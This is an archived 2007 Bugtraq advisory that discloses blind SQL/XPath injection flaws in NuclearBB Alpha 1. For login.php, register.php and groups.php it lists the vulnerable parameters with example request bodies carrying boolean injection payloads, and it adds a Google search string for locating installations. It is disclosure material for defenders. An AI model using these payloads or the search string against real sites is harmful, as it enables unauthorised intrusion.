lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070418191626.11560.qmail@securityfocus.com>
Date: 18 Apr 2007 19:16:26 -0000
From: john@...tinelli.com
To: bugtraq@...urityfocus.com
Subject: NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection
 Vulnerabilities

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"


=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyz@....com
email=xyz@....com
pass1=passwordxyz
pass2=passwordxyz
website=xyz@....com"+and+"1"="0
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com
icq=xyz@....com
signature=xyz@....com
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyz@....com
email=xyz@....com
pass1=xyz@....com
pass2=xyz@....com
website=xyz@....com
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com"+and+"1"="0
icq=xyz@....com
signature=xyz@....com
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyz@....com
email=xyz@....com
pass1=xyz@....com
pass2=xyz@....com
website=xyz@....com
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com
icq=xyz@....com
signature=xyz@....com"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

username=xyz@....com
email=xyz@....com+and+1=0
pass1=xyz@....com
pass2=xyz@....com
website=xyz@....com
location=xyz@....com
msn=xyz@....com
yahoo=xyz@....com
aol=xyz@....com
icq=xyz@....com
signature=xyz@....com
coppa_state=over&register_submit=Register


John Martinelli
john@...tinelli.com
http://john-martinelli.com

April 18th, 2007

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ